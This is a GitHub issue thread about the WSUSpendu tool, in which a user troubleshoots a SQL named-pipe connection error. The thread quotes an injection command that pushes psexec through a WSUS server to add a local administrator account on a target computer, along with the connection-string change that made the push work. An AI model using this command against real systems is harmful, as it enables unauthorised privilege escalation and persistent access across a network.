### ISSUE TITLE
Unable to login using WSUSpendu.ps1

### ISSUE THREAD

**Issue by Bhusp** [AlsidOfficial/WSUSpendu#6]
Hello folks,

We have got an access to WSUS server in our organization and we wanted to execute following command:

**Wsuspendu.ps1 -Inject -PayloadFile psexec.exe -PayloadArgs '-accepteula -s -d cmd.exe /c "net user <username> <password> /add && net localgroup Administrators <username> /add"' -ComputerName <computer_name>**

but getting following error:

**Connection : A network-related or instance-specific error occurred while establishing a connection to SQL Server. The
server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured
to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server)
At C:\Users\administrator\Desktop\WSUSpendu-master\WSUSpendu-master\WSUSpendu.ps1:602 char:24
+ $g_SQLCmd.Connection = Connection
+                        ~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Write-Error], WriteErrorException
    + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Connection**

Named pipes are enabled.

Also, when we try to login into the SQL server management studio using: 
server name: np:\\.\pipe\MSSQL$MICROSOFT##WID\sql\query 
Authentication: Windows Authentication
username: <computername>/<username>
it gives the following error:

**Cannot connect to np:\\.\pipe\MSSQL$MICROSOFT##WID\sql\query** 

SQLCMD.exe also gives the following error:

**.\SQLCMD.EXE -S \\.\pipe\MICROSOFT##WID\sql\query
Sqlcmd: Error: Microsoft ODBC Driver 13 for SQL Server : Named Pipes Provider: Could not open a connection to SQL Server [2]. .
Sqlcmd: Error: Microsoft ODBC Driver 13 for SQL Server : Login timeout expired.
Sqlcmd: Error: Microsoft ODBC Driver 13 for SQL Server : A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online..**

Any help is appreciated!

**Comment by Bhusp** [comment]
We could SQLCMD like this:

**.\SQLCMD.EXE -S np:\\\\\<server hostname>\pipe\sql\query**

So, we just replaced line 92 in WSUSpendu.ps1 to this:

**$Conn.ConnectionString = 'Server=np:\\\\\<server hostname>\pipe\tsql\query;Database=SUSDB;Integrated Security=True'**

and it worked like a charm. We could push a patch and everything.

Closing this issue.

**Comment by Aorimn** [comment]
Hi, thank you for this report and sorry for the delay answering it.

This issue/feature has been a long time in our target, but it should now be fixed by the latest commit.

Thanks again for the report.
